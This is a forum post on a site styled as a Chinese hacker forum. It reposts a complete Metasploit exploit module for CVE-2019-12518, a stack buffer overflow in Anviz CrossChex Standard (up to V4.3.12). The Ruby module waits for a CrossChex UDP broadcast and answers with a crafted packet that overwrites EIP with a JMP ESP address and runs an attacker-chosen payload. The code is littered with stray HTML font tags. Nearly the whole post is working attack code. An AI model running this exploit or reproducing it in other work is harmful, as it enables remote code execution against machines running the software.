• Welcome to the world's largest Chinese hacker forum

    Welcome to the world's largest Chinese hacker forum, our forum registration is open! You can now register for technical communication with us, this is a free and open to the world of the BBS, we founded the purpose for the study of network security, please don't release business of black/grey, or on the BBS posts, to seek help hacker if violations, we will permanently frozen your IP and account, thank you for your cooperation. Hacker attack and defense cracking or network Security

    business please click here: Creation Security  From CNHACKTEAM

Anviz CrossChex-缓冲区溢出漏洞


This Wind

Recommended Posts

发布内容作者:Metasploit                                              漏洞危害等级:critlow_3.gif〔高〕

 

##<font></font>
# This module requires Metasploit: https://metasploit.com/download<font></font>
# Current source: https://github.com/rapid7/metasploit-framework<font></font>
##<font></font>
<font></font>
class MetasploitModule < Msf::Exploit::Remote<font></font>
  Rank = NormalRanking<font></font>
  PACKET_LEN = 10<font></font>
<font></font>
  include Msf::Exploit::Remote::Udp<font></font>
<font></font>
  def initialize(info = {})<font></font>
    super(update_info(info,<font></font>
      'Name'        => 'Anviz CrossChex Buffer Overflow',<font></font>
      'Description'     => %q{<font></font>
        Waits for broadcasts from Ainz CrossChex looking for new devices, and returns a custom broadcast,<font></font>
        triggering a stack buffer overflow.<font></font>
      },<font></font>
      'Author'          =><font></font>
        [<font></font>
            'Luis Catarino <lcatarino@protonmail.com>',  # original discovery/exploit<font></font>
            'Pedro Rodrigues <pedrosousarodrigues@protonmail.com>',   # original discovery/exploit<font></font>
            'agalway-r7',  # Module creation<font></font>
            'adfoster-r7' # Module creation<font></font>
        ],<font></font>
      'License'           => MSF_LICENSE,<font></font>
      'References'      =><font></font>
        [<font></font>
            ['CVE', '2019-12518'],<font></font>
            ['URL', 'https://www.0x90.zone/multiple/reverse/2019/11/28/Anviz-pwn.html'],<font></font>
            ['EDB', '47734']<font></font>
        ],<font></font>
      'Payload'        =><font></font>
        {<font></font>
            'Space'    => 8947,<font></font>
            'DisableNops' => true<font></font>
        },<font></font>
      'Arch' => ARCH_X86,<font></font>
      'EncoderType' => Msf::Encoder::Type::Raw,<font></font>
      'Privileged'      => true,<font></font>
      'Platform' => 'win',<font></font>
      'DisclosureDate' => '2019-11-28',<font></font>
      'Targets'        =><font></font>
          [<font></font>
            [<font></font>
              'Crosschex Standard x86 <= V4.3.12',<font></font>
              {<font></font>
                  'Offset' => 261, # Overwrites memory to allow EIP to be overwritten<font></font>
                  'Ret' => "\x07\x18\x42\x00", # Overwrites EIP with address of 'JMP ESP' assembly command found in CrossChex data<font></font>
                  'Shift' => 4 # Positions payload to be written at beginning of ESP<font></font>
              }<font></font>
            ]<font></font>
          ],<font></font>
      'DefaultTarget'  => 0<font></font>
      ))<font></font>
    deregister_udp_options<font></font>
    register_options(<font></font>
        [<font></font>
            Opt::CPORT(5050, true, 'Port used to listen for CrossChex Broadcast.'),<font></font>
            Opt::CHOST("0.0.0.0", true, 'IP address that UDP Socket listens for CrossChex broadcast on. \'0.0.0.0\' is needed to receive broadcasts.'),<font></font>
            OptInt.new('TIMEOUT', [true, 'Time in seconds to wait for a CrossChex broadcast. 0 or less waits indefinitely.', 100])<font></font>
        ])<font></font>
  end<font></font>
<font></font>
  def exploit<font></font>
    connect_udp<font></font>
<font></font>
    res, host, port = udp_sock.recvfrom(PACKET_LEN, datastore["TIMEOUT"].to_i > 0 ? (datastore["TIMEOUT"].to_i) : (nil))<font></font>
    if res.empty?<font></font>
      fail_with(Failure::TimeoutExpired, "Module timed out waiting for CrossChex broadcast")<font></font>
    end<font></font>
<font></font>
    print_status "CrossChex broadcast received, sending payload in response"<font></font>
    sploit = rand_text_english(target['Offset'])<font></font>
    sploit << target.ret # Overwrites EIP with address of 'JMP ESP' assembly command found in CrossChex data<font></font>
    sploit << rand_text_english(target['Shift']) # Positions payload to be written at beginning of ESP<font></font>
    sploit << payload.encoded<font></font>
<font></font>
    udp_sock.sendto(sploit, host, port)<font></font>
    print_status "Payload sent"<font></font>
    end<font></font>
end<font></font>
<font></font>
#  [2020-03-20]  #

 

Link to comment
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now